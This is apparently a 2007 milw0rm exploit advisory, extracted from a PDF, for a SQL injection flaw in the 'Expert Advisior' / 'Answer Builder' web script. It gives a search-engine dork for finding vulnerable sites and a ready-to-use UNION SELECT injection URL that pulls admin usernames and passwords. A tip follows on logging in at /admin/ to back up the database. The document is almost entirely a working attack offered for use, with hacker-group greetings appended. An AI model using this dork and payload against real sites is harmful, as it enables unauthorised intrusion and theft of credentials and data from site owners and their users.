Expert Advisior index.php id Remote SQL Injection Vulnerbility.pdf

1 −−==+================================================================================+==−− 2 −−==+ Expert Advisior SQL Injection Vulnerbility +==−− 3 −−==+================================================================================+==−− 4 5 6 AUTHOR: t0pP8uZz & xprog 7 SITE: N/A 8 DORK: intitle:"Answer Builder" Ask a question 9 10 11 DESCRIPTION: 12 pull out admin user/pass from the database 13 14 15 EXPLOITS: 16 http://server.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e ,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/* 17 18 19 NOTE/TIP: 20 admin login is at /admin/ you can backup DB there. 21 22 23 GREETZ: milw0rm.com, H4CKY0u.org, G0t−Root.net/G0t−Root.org ! 24 25 26 −−==+================================================================================+==−− 27 −−==+ Expert Advisior SQL Injection Vulnerbility +==−− 28 −−==+================================================================================+==−− 29 30 # milw0rm.com [2007−07−17] Page 1/1 Expert Advisior index.php id Remote SQL Injection Vulnerbility t0pP8uZz 07/17/2007